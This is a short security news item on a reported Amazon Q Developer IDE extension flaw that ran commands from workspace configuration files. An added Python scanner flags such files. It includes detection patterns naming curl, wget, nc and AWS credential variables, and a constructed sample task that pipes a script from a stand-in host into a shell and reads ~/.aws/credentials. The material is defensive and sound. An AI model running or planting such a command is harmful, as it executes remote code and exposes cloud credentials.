
Amazon Q Developer extension vulnerability could have exposed cloud credentials


Wiz researchers discovered a vulnerability in the Amazon Q Developer extension for Visual Studio Code that could have allowed attackers to steal developers' cloud credentials, Security Week reports. The issue arises from the extension automatically executing commands found in workspace configuration files without asking for user consent. An attacker who lured a developer into opening a repository containing such a file could therefore have gained a foothold in the developer's cloud infrastructure.

The vulnerability, tracked as CVE-2026-12957, allowed attackers to execute arbitrary commands by embedding them in workspace configuration files. When a developer opened such a repository, the Amazon Q Developer extension would run these commands automatically, potentially exfiltrating active cloud credentials and API keys. Wiz cites fake coding tests, typosquatted open-source packages, and malicious pull requests as likely delivery vectors. AWS was notified on April 20 and released a patch on May 12.

The vulnerability affected multiple IDEs, including Visual Studio Code, JetBrains, Eclipse, and Visual Studio. AWS stated that the language server updates automatically for most users, mitigating the risk. Similar vulnerabilities have been identified in other AI coding tools, highlighting a broader security concern in the development ecosystem.
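The article describes the risk at a high level: a repository ships IDE workspace configuration that an extension executes as soon as the project is opened. A defensive habit that follows from this is to scan a freshly cloned repository's workspace configuration before trusting it in an IDE. The script below is an added example written for this page, not code from Wiz, AWS or Security Week; it assumes VS Code-style JSONC files under `.vscode/` and generic command-bearing key names (`command`, `args`, `shell`, and so on), since the article does not name the specific file or key that the extension honoured. The sample repository contents are constructed.

```python
"""Pre-trust scan of IDE workspace configuration files cloned with a repository.

Flags entries whose keys or values look like shell commands or references to
cloud credential material, so a developer can review them before opening the
repository in an IDE whose extensions may execute workspace-scoped commands.
Added example; paths and key names below are assumptions, not from the article.
"""
import json
import re
from dataclasses import dataclass

# Generic key names that commonly hold something an IDE or extension executes.
COMMAND_KEY_RE = re.compile(r"(command|cmd|exec|run|shell|script|args|hook)", re.I)

# Value patterns: shell chaining and substitution, download tools, and
# references to cloud credential material (AWS variable names as an example).
SUSPICIOUS_VALUE_PATTERNS = {
    "shell-chaining": re.compile(r"(\|\||&&|;|\|)"),
    "command-substitution": re.compile(r"\$\(|`"),
    "network-fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest|nc)\b"),
    "credential-reference": re.compile(
        r"(AWS_SECRET_ACCESS_KEY|AWS_ACCESS_KEY_ID|AWS_SESSION_TOKEN|\.aws[/\\]credentials)"
    ),
}


@dataclass(frozen=True)
class Finding:
    path: str      # config file inside the repository
    key_path: str  # dotted path to the flagged entry, e.g. tasks[0].command
    reason: str    # which check fired
    value: str     # the flagged string, for reviewer context


def strip_jsonc_comments(text: str) -> str:
    """Remove // and /* */ comments (VS Code-style JSONC) outside of strings."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped char, including \"
                out.append(text[i + 1]); i += 2; continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True; out.append(c); i += 1
        elif text.startswith("//", i):       # line comment: drop to end of line
            j = text.find("\n", i); i = n if j == -1 else j
        elif text.startswith("/*", i):       # block comment: drop to closing */
            j = text.find("*/", i + 2); i = n if j == -1 else j + 2
        else:
            out.append(c); i += 1
    return "".join(out)


def _walk(node, key_path: str, path: str, findings: list) -> None:
    """Recursively visit every string leaf and apply the key and value checks."""
    if isinstance(node, dict):
        for k, v in node.items():
            _walk(v, f"{key_path}.{k}" if key_path else k, path, findings)
    elif isinstance(node, list):
        for i, v in enumerate(node):
            _walk(v, f"{key_path}[{i}]", path, findings)
    elif isinstance(node, str):
        leaf_key = key_path.rsplit(".", 1)[-1]
        if COMMAND_KEY_RE.search(leaf_key):
            findings.append(Finding(path, key_path, "command-bearing key", node))
        for reason, pattern in SUSPICIOUS_VALUE_PATTERNS.items():
            if pattern.search(node):
                findings.append(Finding(path, key_path, reason, node))


def scan_workspace_config(files: dict) -> list:
    """Scan {relative_path: file_text}. A file that fails to parse is itself a
    finding: configuration a reviewer cannot read is not configuration to trust."""
    findings: list = []
    for path, text in files.items():
        try:
            data = json.loads(strip_jsonc_comments(text))
        except json.JSONDecodeError as exc:
            findings.append(Finding(path, "", "unparseable (review manually)", str(exc)))
            continue
        _walk(data, "", path, findings)
    return findings


# Constructed sample: a benign settings file and a task that fetches and runs a
# script, then reads the local AWS credential file.
SAMPLE_REPO_FILES = {
    ".vscode/settings.json": '{\n  // editor preferences only\n  "editor.tabSize": 2\n}',
    ".vscode/tasks.json": (
        '{"version": "2.0.0", "tasks": [{"label": "setup", "type": "shell",'
        ' "command": "curl -s https://example.invalid/s | sh; cat ~/.aws/credentials"}]}'
    ),
}

if __name__ == "__main__":
    for f in scan_workspace_config(SAMPLE_REPO_FILES):
        print(f"{f.path}:{f.key_path} [{f.reason}] {f.value}")
```

The scan is deliberately noisy rather than precise: its job is to put every command-shaped entry in front of a human before the IDE's extensions get to interpret it, which is the decision the vulnerable extension skipped. Run it from the repository root over the files under `.vscode/` (or whichever workspace directory the IDE in use reads) before opening the project.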

Source: Security Week
